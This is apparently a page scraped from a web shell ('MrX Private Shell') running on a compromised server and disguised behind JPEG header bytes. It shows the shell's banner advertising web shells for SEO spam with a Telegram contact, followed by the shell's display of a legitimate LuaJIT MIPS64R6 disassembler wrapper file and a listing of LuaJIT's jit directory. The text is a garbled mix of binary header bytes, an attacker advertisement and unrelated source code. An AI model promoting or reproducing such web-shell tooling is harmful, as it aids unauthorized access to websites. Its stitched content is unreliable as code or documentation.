����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
----------------------------------------------------------------------------
-- LuaJIT MIPS64R6 disassembler wrapper module.
--
-- Copyright (C) 2005-2026 Mike Pall. All rights reserved.
-- Released under the MIT license. See Copyright Notice in luajit.h
----------------------------------------------------------------------------
-- This module just exports the r6 big-endian functions from the
-- MIPS disassembler module. All the interesting stuff is there.
------------------------------------------------------------------------------
local dis_mips = require((string.match(..., ".*%.") or "").."dis_mips")
return {
create = dis_mips.create_r6,
disass = dis_mips.disass_r6,
regname = dis_mips.regname
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| bc.lua | File | 6.42 KB | 0644 |
|
| bcsave.lua | File | 17.69 KB | 0644 |
|
| dis_arm.lua | File | 18.89 KB | 0644 |
|
| dis_arm64.lua | File | 30.21 KB | 0644 |
|
| dis_arm64be.lua | File | 619 B | 0644 |
|
| dis_mips.lua | File | 21.49 KB | 0644 |
|
| dis_mips64.lua | File | 706 B | 0644 |
|
| dis_mips64el.lua | File | 717 B | 0644 |
|
| dis_mips64r6.lua | File | 717 B | 0644 |
|
| dis_mips64r6el.lua | File | 728 B | 0644 |
|
| dis_mipsel.lua | File | 715 B | 0644 |
|
| dis_ppc.lua | File | 19.83 KB | 0644 |
|
| dis_x64.lua | File | 712 B | 0644 |
|
| dis_x86.lua | File | 33.43 KB | 0644 |
|
| dump.lua | File | 20.37 KB | 0644 |
|
| p.lua | File | 8.87 KB | 0644 |
|
| v.lua | File | 5.73 KB | 0644 |
|
| vmdef.lua | File | 8.14 KB | 0644 |
|
| zone.lua | File | 1002 B | 0644 |
|